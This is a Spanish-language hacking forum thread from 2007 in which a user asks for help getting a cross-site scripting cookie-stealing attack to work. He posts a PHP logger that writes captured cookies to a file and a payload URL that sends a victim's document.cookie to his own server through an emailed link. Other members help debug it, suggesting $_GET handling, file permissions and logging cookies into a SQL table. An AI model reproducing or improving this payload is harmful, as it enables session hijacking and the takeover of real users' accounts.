elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
21 Agosto 2008, 14:53  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Ayuda con XSS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Ayuda con XSS  (Leído 976 veces)
magarcan

Desconectado Desconectado

Mensajes: 65


Ver Perfil
Ayuda con XSS
« en: 28 Noviembre 2007, 12:56 »

He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS

Adjuntos:
Mi script PHP
Código:
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>

Lo que pongo en el hipervínculo:
Código:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>
En línea
EvilGoblin

Desconectado Desconectado

Mensajes: 808


LAIN IS LAIN


Ver Perfil
Re: Ayuda con XSS
« Respuesta #1 en: 28 Noviembre 2007, 14:32 »

y estas seguro que esa persona esta logueada?

pork de no ser asi recibiras el archivo en blanco..


y creo que en el txt te falta el $_GET para capturar la Cookie desde el link

con el metodo get

=D

Suerte ;D
En línea



Experimental Serials Lain
Ing_Amc
WebDeveloper & DB Designer
Colaborador

Desconectado Desconectado

Mensajes: 4.385


Tomalaaaa


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #2 en: 28 Noviembre 2007, 14:34 »

He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS

Adjuntos:
Mi script PHP
Código:
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>

Lo que pongo en el hipervínculo:
Código:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>

Dale
Código:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
En línea



La gente sueña por la noche con volar, nosotros salimos por la noche y volamos. JMF.
magarcan

Desconectado Desconectado

Mensajes: 65


Ver Perfil
Re: Ayuda con XSS
« Respuesta #3 en: 28 Noviembre 2007, 14:54 »

Gracias por las respuestas.
Cita de: EvilGoblin
y estas seguro que esa persona esta logueada?
Sí, porque estoy haciendo las pruebas con una cuenta de mail que me he creado para hacer las pruebas.

Cita de: EvilGoblin
y creo que en el txt te falta el $_GET para capturar la Cookie desde el link
¿En que parte del código?

Cita de: Ing_Amc
Ahora mismo lo pruebo. Por cierto, ¿qué hace eso que has añadido?
En línea
EvilGoblin

Desconectado Desconectado

Mensajes: 808


LAIN IS LAIN


Ver Perfil
Re: Ayuda con XSS
« Respuesta #4 en: 28 Noviembre 2007, 15:11 »

te dice que le agreges una cadena, para comprobar verdaderamente si guarda el texto ;P

si te guarda solo "blablabla"

es que no habia cookie para guardar ^^
En línea



Experimental Serials Lain
magarcan

Desconectado Desconectado

Mensajes: 65


Ver Perfil
Re: Ayuda con XSS
« Respuesta #5 en: 28 Noviembre 2007, 15:26 »

Ok, el caso es que no me crea el archivo, por lo que pienso que la url vulnerable que utilizo ha sido arreglada. Ahora me toca buscar nuevas.  :-\
A ver si tengo suerte.
En línea
EvilGoblin

Desconectado Desconectado

Mensajes: 808


LAIN IS LAIN


Ver Perfil
Re: Ayuda con XSS
« Respuesta #6 en: 28 Noviembre 2007, 19:29 »

Creo que no es nada dificil comprobar si el error de XSS sigue funcionado :P

se supone q vos lo encontraste.....

y no sabes como capturar la cookie?

 xDD no entiendo aun como pudiste encontrarlo.. y menos aun como no sabes comprobar si funciona o no... y capturar la cookie -.-

aniway! ^^=D

MUCHA SUERTE (Y)
En línea



Experimental Serials Lain
magarcan

Desconectado Desconectado

Mensajes: 65


Ver Perfil
Re: Ayuda con XSS
« Respuesta #7 en: 28 Noviembre 2007, 19:39 »

Definitivamente la vulnerabilidad ha sido corregida (es que la descubrí hace tiempo cuando empecé a estudiar los XSS).
Me toca descubrir otra vulnerabilidad para hacer pruebas y ver si con mi código me guarda las cookies.

PD: en la entrada XSS de la wikipedia hay otro código para guardar las cookies más currado que el mío, a lo mejor lo adopto.
PD2: si me recomendáis algún link sobre XSS nunca está de más.

---GRACIAS---
En línea
zhynar_X

Desconectado Desconectado

Mensajes: 516


Use linux my friend...


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #8 en: 28 Noviembre 2007, 21:57 »

Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...


Mira este link sobre los XSS (esta muy currado  ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf


Saludos
En línea

Me he creado un blog:
http://zhynar.blogspot.com  Aver si os gusta! ;)


Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo)
hackpsycho

Desconectado Desconectado

Mensajes: 396



Ver Perfil
Re: Ayuda con XSS
« Respuesta #9 en: 29 Noviembre 2007, 03:50 »

Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...


Mira este link sobre los XSS (esta muy currado  ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf


Saludos

Muy buen documento me lo lei completito  ;D
En línea


G4rBaG3

Desconectado Desconectado

Mensajes: 188



Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #10 en: 29 Noviembre 2007, 21:29 »

Hola, recomiendo crear el txt primero.
Saludos.
En línea

Don't worry, be hacked....
zhynar_X

Desconectado Desconectado

Mensajes: 516


Use linux my friend...


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #11 en: 29 Noviembre 2007, 21:42 »

Hola, recomiendo crear el txt primero.
Saludos.

Indicando el modo "a" al abrir el archivo crea autmomaticamente el txt


Saludos!
En línea

Me he creado un blog:
http://zhynar.blogspot.com  Aver si os gusta! ;)


Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo)
Azielito
Administrado y
Moderador Global
*****
Desconectado Desconectado

Mensajes: 6.614


>.<


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #12 en: 29 Noviembre 2007, 22:32 »

si no te genera/escribe en el documento es por que no tienes lo spermisos apra escribir en el, dale permisos de escritura ¬¬

para verificar que sea vulnerable es facil ¬¬

En línea


Ferсhu

Desconectado Desconectado

Mensajes: 1.212

Menos palabras y Mas codigos.


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #13 en: 29 Noviembre 2007, 22:48 »

si tu pagina esta en un server de internet dificilmente tenga permisos para escribir, si esta en tu pc dale permisos y sino usa sql y crea una tabla, insertas la cookie como dato y listo.

Verifica q las cosas funcionen por pasos, no crees todo y dsp no sabes q es lo q no anda jeje.


Saludos!!
En línea

Ing_Amc
WebDeveloper & DB Designer
Colaborador

Desconectado Desconectado

Mensajes: 4.385


Tomalaaaa


Ver Perfil WWW
Re: Ayuda con XSS
« Respuesta #14 en: 29 Noviembre 2007, 23:41 »

Aprende PHP primero xD
En línea



La gente sueña por la noche con volar, nosotros salimos por la noche y volamos. JMF.
Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC